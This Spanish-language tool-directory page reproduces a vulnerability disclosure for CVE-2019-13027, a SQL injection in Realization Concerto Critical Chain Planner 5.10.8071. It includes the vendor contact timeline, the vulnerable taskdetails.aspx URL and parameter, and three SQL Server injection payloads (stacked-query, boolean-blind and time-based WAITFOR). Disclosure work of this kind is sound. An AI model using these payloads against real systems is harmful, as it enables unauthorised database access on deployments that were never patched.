Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-13027 — Detalles para divulgar CVE-2019-13027 | Kitploit
Herramientas/GitHubGitHub/ickogz/cve-2019-13027
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubickogz/cve-2019-13027

CVE-2019-13027

Detalles para divulgar CVE-2019-13027

Ver Repositorio
1hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-13027

Detalles para divulgar CVE-2019-13027

Cronología de contacto con el proveedor: 1 de julio de 2019 -> Sin respuesta, ningún correo de vuelta.

4 de julio de 2019 -> Sin respuesta, ningún correo de vuelta.

8 de julio de 2019 -> Correo enviado, Github creado.

11 de julio de 2019 -> Sin respuesta del proveedor. Vulnerabilidad divulgada.

[Tipo de vulnerabilidad] Inyección SQL [Código base del producto afectado] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Versión: 5.10.8071 (Otras versiones de la rama 5.x probablemente estén afectadas. No se puede probar con >otras ramas)

[Componente afectado] Realization Concerto Critical Chain Planner (también conocido como CCPM) 5.10.8071 tiene algunos problemas de seguridad críticos, siendo inyección SQL al menos en la página web taskupdt/taskdetails.aspx a través del parámetro "projectname"


[Tipo de ataque] Remoto

[Vectores de ataque] La aplicación tiene muchas XSS/CSRF reflejadas (por ejemplo, en checklist/checklist), pero la parte complicada son las inyecciones SQL. Se necesita algo de manipulación dependiendo de la versión de SQL Server y/o IDS/IPS.

URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined

ProjectName (foo) debe existir y ser válido. Haz fuzzing sobre el resto de parámetros (o usa una petición real). foo también tiene un XSS

SQL detectado (payloads de SQLMAP) Parámetro: projectname (GET)

root@kitploit:~
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: projectname=foo';WAITFOR DELAY '0:0:5'--

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: projectname=foo' AND 3676=3676-- 

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 

[Proveedor del producto] REALIZATION - https://www.realization.com/

Descargar herramienta